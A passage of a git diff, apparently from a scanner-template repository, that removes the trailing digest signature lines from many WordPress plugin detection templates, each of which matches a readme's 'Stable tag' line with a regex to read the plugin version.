b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 1d82d1cfb0..ae2451ca38 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009933433c67145601b9b66ffeab4cdd8fa333b304a2844692a76d43c21a08d45502207c6ff2a2e0ae1abb1fea74efa403c5303cdba01811032f6876fcbc66166d48de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 78c902cfd0..dcc61d1255 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202664a6dcfe15b6f6edab7d5db1de55e91f26e17812219327441bf32472c2bb8502203b48fcd531dcf0a7dafb74628327211370b7b3cece76e152e368899014eb633f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d069c96e9a..d1d2c1c1d0 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008389d8bcb95a7188cdd47168f8b2f2eeea64d036e40a519b185fc655f2d2bce1022100d8ed4af5e418ff021231ee3295ea41accea60280cdf28672ab24fcb817be031c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index ea03b4820a..5f5e8afed5 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210081469799ca9b4c5a61e4c6259fdac1e1348d08686d828a8012f530f6be813e7002205f1bd8b49545107f85912e5c2b09555526b5b13a73b17fd48e58472fce208955:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 66dc337e1b..d15634bb2b 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b09ae3e017ff1ea69557e0218f1931e824f26dea54ca02e4c19113b967eb3e5c022100d89b69434a0d0fb8788748b1c985124d01a67acb2486660465bdf6ffb231c097:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 9af7860b60..7da04be5d3 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008dbdd6e698d6dcc1e55e70318122a51f38ef74ad6608493def274e668425aa4b02210080ea3158c1f85ebd17a90e05318b798fbdd8e1c7c38b2cdbd12a2a052be0f538:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 2aee720c9f..a79253cec5 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022026249889f24be8bcedb9201227ba222d6912545356bdd367b0993085ed3be5fc022007655a3ec4e444833c2a5ebf2206ab53b2136130e0b43eedc956681e60b02ea5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 461b7f4f31..77fc04a220 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e90c0daabbc40a1d5cf3b39990642e58fa34b1a4a874cc911b5fcefb1edc69df0220490e72b7853f7b54e57652a9b2c366a3eaa6b2e643c71e741d506aec60c83949:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 271eeaa9d2..733f9ee453 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203001b4d3370cb4347659cf40064da4ec3faad4503d888d1b93ed7e92ba680c5202206e63b8928799481ebbd322e116e99e4acff644a71cf3db1df76fdb78b2ce3231:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index c8bae41ae5..0af08f0ac0 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220578b3c194ba65d3420a8f0340c187c57fde8a3ac969617c92e449acd3c66bd6d022100b658bf1ae0aee11697652649ba047911214c36ee65f0263caadfdd90654c2e69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 4647f12ec8..1e4c77fbca 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a297e0ed50269f7cbb3ce25671f666c30ca099aa77314066433fde64c0df89af02200a4b2909c7f16ccd74ca10c3b547f47b6a7f876975218330d86367a51bd7060b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 29cb731ac1..295e3fe82d 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d943f3b98200e874b8f57badf86db623bc390e06211d6ba527a9bcc8626817c0022100c6750a0f488d47c48ea393f79240c93eae92e457736deffc6e8d3823a07b1873:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index e6164174d0..862f73201f 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f913afff9b1296168076c153cfefa05dfdb376150b2c255b3832413b6a4c7d9a022100deb95cf333db71e531d78a92379e84e28295055f35b400c37d8de9820a273f9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 81977e1652..711b64f9d0 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204e3fd29cbd7515c09448e03fac7ae978c4d460f4a9f6d48b8f10b32e61944fc002210093146f821ce4149a51c0a1649ebea364897e6537be07c9eefbf5ca55310b15e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 01f6ee06a9..58ddcfab78 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e2587cd88ed55acbe451b7487a7dc57f665688cd023ed18618327329078b4a78022100c9b2a6b8c9ceca3d88f84ce8d9e81fa46e38eea244e09df6b1b170d1ad1722eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 80b7a22582..305d74e8ea 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022017a72b878a05f6029aa82ad653a0470bb536042b0aee5c0da04db6372de9c0b7022100b6cad2ee5f8236bf5256b8e09a84a182d532ef0f5c474f660008471311f29751:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 15c3fc6017..668162fc4e 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205e21ba9fef89995378dea9ec2175f3140bf267cbdc1cfec8b2085ed963c9df3602203b87029aafa835cb015e0c2c5088d36303f7b5ea8652bab31340ebfedda61316:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index c0f7ffb779..4f99876557 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220152ca6b2acb90a13f8cb3842f6adadc6639cfde8582b06e909a7747300aa56a702203f42ab9271b47eeb7ed9ce1bd8f147b32a8eaeeb0dd5b5c0405325ef09875ce6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index f04ae9702e..a0d2554492 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200ff395674645a466f3fc43380b156f974cc585c284364352889fcf19edafce79022029c7bc6a2d02fe5d16bf9fcbbdbc1908c49a53059bf577b920395d599682f53b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index d2d4183e6e..4e5046273d 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203753c7ea03405725e47a9ec8b5ff966c2c05b95b32a73931f395bd37fcf399ec022100f843fe32971d4ef86d93036a91dbd8075e6c0f4a1ce627b9f1d1dec8b14cb8ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index 6e1e1ae72f..f44cee7980 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e6a07616d10a70185e99e650d2a69c4244163c721cd35c3afdc5fc36eb165a0c02206e860d870664530ce15e84a4cf2e6eb826a40f45836d96a03bf04569b8f02505:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index fce2200c91..39130db767 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008ccd1e042cd5daa902efd212f079dc56d50de10d10c1789c88c4b718852e439902203d6685e6c5f7572cdb9a62e566313d6688f151cce6ce7cd6192ac8d10ddce7ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index ae08e590f5..39c497073c 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022042e8bb9a31ef2a4692a65acf0086dc9964ac3e77a5c9c27c9550f7864f0de12d0220225f3b82b29575961cc63da6abbbb91c7b9d8bb711a1bd1baa22a04f5e5ea7e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index 5abdc118bf..b848288b55 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206898a583c9fa41df15935e386492d30942c339b49f18fd5b564c880b6e7746e602210096da35f2a6b4d902b7891bd53377f72fb05fca8e3979e847b1a1ac8e88868704:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 51e68b78ad..4d10178692 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100df72a6981d6cf5db10f953256094c9899f7f2f0b790fcbf69eddceb2abe6b1430220730b101b3c7c3654eb3e4580a9b41f1aa42c15fd54070402ca8adf819cf4f7d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 8b65cc3660..7aac0a153f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bd03c7f4e0f93d317ff50554d6b5088004a0ecd16303dc7bd99a0d42db52607d022100c445d6427560bac80fd51ca8c05b1f9365250d744b8fad1c08a8e6d481477415:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 3ad8d9152f..d0cebd5316 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220779a7057177f3948627d9da2c8f143d80970d1fc2e12d3a985801f9b2a985a77022100d20a60405f047279845004a0fbdaaf9993344293fd76a534b0c13a77c1860fad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 39f625ba8f..ff20779157 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203c300f68f3edffe374622739ce68def203917817e89e674d80c49dd6a9685dc5022100a8d6bcae41b748301c36bfd2578c586151788766d90fdbe3a2cc3b0b6b0881cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 67ea029ec7..fffdc7d017 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dc6376415525096f0a0e074d1aa4c4b0e7f39f09e749786319bbb7794ad1d45d02204a4f0f5e3e8eda8d4ed7cfa33afe67f2eec173c795cc5faca8e820f4d35fce40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 074472560f..7a9746a70d 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c3c2fcbdd024009a5b4fc7db7700faee642d4cc8db1fefa9e8835ac432498f46022100e1a0f0ca627e2a475495bb2914eb4503785d12bf2c500f8de0f8099b2d7e5eb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3d9bef107a..3fe86debf5 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a6fb36007af3ea3c98a5cbfbf260e530adcaed2047e29d496d06f86c27f756e4022035db63861f5aab9af81589c032151ea572869c3246da95889c29ea2c331f474d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 82627c3276..3deac58709 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210098449bb5abfe954ce2332fdd2920adca8ca701472e75c9c71add01272c7af618022100929ad07b40ebf60373e64cbb760c566636ccda4a1aefe5925f582bd9d5ad8e5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 8fff9b3aac..e7e7c27682 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220419f9b093e525f0768b7fd32984367b6d5aeb545535f51fa94732b043c3e41ae022100ff722037b77f4c778746a29b642e56b474d85163d1e18c908102ccf5f2065ced:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 490a83cbfe..ad4ebefa4b 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022069685f2c3f67ac9f169802e81e664319b3042daeaed57e127957e9befc6e528e022100e44977f1efa0cd2284cdfb439c47d027ab1490383082f279c4a2c63f66979387:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 74785950fc..8e88c81c0a 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200261d44f3caf6cb58700bc9c2ba96deb532a0150518090b8ee736a93729d7d85022020eff21b4ff0599829f394ed94a004d25169a86833a0a7c7a98fed753bf75733:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 23a6c48fd0..39d269fb85 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220579045269369870a4afc269f0f1825e74eaec2030a60c5b84ee198e0fbbba97e0220231d045ea0fcf01ee5c2a97a95234f713de4e201bd9f49513d4a167139ba95d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 40aef8678b..fc126d83c6 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220729f6588cf0ed9adf51af8c1fb72c7a999f62c6711b9336606287cb7b7ed3754022100ee239653793bca1c9fae4bda883a80cebc6ca27648a26f50f561bc8507895674:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 39237330ec..8c49a34259 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220545e9cb62706e8c6c878af846815b72f8233f8d453c3738282e7982643abe1f902203be3b1d6e58b5041a28988a346644d8c942dff5da070a7df07cfc857fa6661d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 4beaeedc92..6ac2212b4b 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b7c53c5c0f28d3f242b40bf26d9a07a2b7c96363e58d5f404c8ad7efd3ebaf9102205694e769cd16f23535de5315b7dd4127f91f4cb462c7fa2736700ef0bd5d7164:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 343ca4468c..71c71b5ed1 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022041e329d2e53be84dbea5bfce735244c0280976bb65acef374c5b15e344da488b022100c8fd117b5a8d05b90796b90196d407e0fc26294ac048e48e9d0d9ff16588272b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7d2e9e60ed..7b47adc274 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022035742e9306927fe39cc03b4f3ee8ff62d2099e1c31b7099cff59e47dd1a73f2c022100adbb54f565706ff0c1099c413e4e228529cfb288be3859784f31d3fcc05103d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index b880c22a9a..286dfdaec6 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203d9881fda276194c449ca40e75d0a9cdca3099f14323fb93f9e65bb6b3c23927022078e561bd6fac4555a06aeca9bb8e973ab50d9ddc706d1d71ce5763730ecb9bf5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index e497eae7b4..c4928059f6 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ca7ae7e5d401676e7bcf90a83ae55602c370370f5f0d4e04873d397d021479ba02201abb2dfa8e00d10f3c8b50d454ddbe675b9f4a0aa5b161af40d1158835a731b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 6bb29595d8..f6a7836f35 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206ceb9634652977e034ae1dd5cc3351037a9e25c1d80d68b78c3004753fd765b9022100beed4b0f298cd3e97c419cb8a3bfcae52681f0fd2ec2c6e9fcf835c99a6a638d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 8aeb595909..b7af708c4f 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a99ba9c080cf1ad0c35c6f66065ff8862b3d89514b147b50abf5957fbe3e446d022065022ec4019a20a0e36095ffe547da22b08809cf42f6b23515b0af0428463258:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 536acdc04c..61a793edf7 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200ef67914975847a9af8cec496ff2d6224e18e45a106d897fa380f6e85486262a0220547b75a785c7c6321865769ce298b39ef6cd9ec39843e773eb6be5a443e8fec5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 986553d0bf..0da88d5d3f 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201dff9118b9bd17f8806d597412ce72dc63c3d7a1b6c8c5978663fafb8a93fe96022100d03d077667b9f1368e11db07cce24378906b298f6364ef939c1b4423085dc452:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml 